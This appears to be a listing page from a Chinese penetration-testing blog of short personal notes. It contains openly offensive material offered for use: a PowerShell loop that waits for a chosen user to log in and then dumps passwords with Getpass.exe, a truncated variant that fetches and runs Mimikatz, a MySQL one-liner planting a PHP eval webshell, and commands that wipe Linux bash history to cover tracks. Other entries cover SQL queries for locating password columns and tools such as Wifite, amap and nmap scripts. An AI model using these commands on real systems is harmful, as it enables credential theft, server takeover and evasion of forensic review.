个人笔记

powershell循环检测需要的用户是否登录并抓密码

  while($true){ //执行的命令 $a=query user #从返回结果里检查关键字 if([string]$a -like "*关键字*") { #执行程序 Getpass.exe >>C:\test.txt } #时间单位毫秒 sleep -mill 3600000 } while($true){ //执行的命令 $a=query user #从返回结果里检查关键字 if([string]$a -like "*关键字*") { #下载执行Mimikatz IEX (New-Object N…继续阅读 »
个人笔记

渗透中快速摸清MSSQL数据库的一些查询语句

MSSQL库名查表 Select Name From 库名..SysObjects Where XType='U' order By Name   MSSQL根据列名查表名 SELECT name FROM sysobjects WHERE id IN (SELECT id FROM syscolumns WHERE name='password' )   MSSQL根据列名模糊查表名 SELECT name FROM sysobjects WHERE id IN (SELECT id FROM syscolumns WHERE name like '%password%')   MSSQL根据表名查列名 SELE…继续阅读 »
个人笔记

渗透中快速摸清MYSQL数据库的一些查询语句

查询mysql包含某个字段的所有表 show  tables  like 'crm_%'   MYSQL根据字段查表名 SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name';   SELECT column_name from information_schema.columns WHERE column_name LIKE ’%searchTerm%’ AND table_schema = ‘yourDB’   SELECT column_name from information_schema.columns W…继续阅读 »
个人笔记

渗透中快速摸清Oracle数据库的一些查询语句

Oracle根据字段查表名 SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;
个人笔记

Mysql一句话导出Webshell

Select '<? php eval($_POST[密码]);?>' into outfile 'd:/wwwroot/1.php';
个人笔记

linux清历史记录

cd ~ cat .bash_history > .h history -c;history -w;cat .h > .bash_history; rm -f .h;exit
个人笔记 安全工具

自动化无线网破解工具Wifite v2

wifite是一款自动化wep、wpa破解工具,不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行,期间无需人工干预。   先复制一下说明 COMMANDS -check <file> check capfile <file> for handshakes. -cracked display previously-cracked access points GLOBAL…继续阅读 »
个人笔记

服务枚举工具Amap v5.4

amap -bq 7kb.org 1-800 amap -bq 目标 端口   amap v5.4 (c) 2011 by van Hauser <[email protected]> www.thc.org/thc-amap Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...] Modes: -A Map applications: send triggers and analyse responses (default) -B Just grab b…继续阅读 »
个人笔记

Acunetix Web Vulnerability Scanner 10发布

WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。 下载地址如下  aHR0cDovL3d3dy41MnBvamllLmNuL3RocmVhZC…继续阅读 »
个人笔记

nmap常用script脚本

都是自己常用的 随便发发 auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力 discovery: 对网络进行更多的信息,…继续阅读 »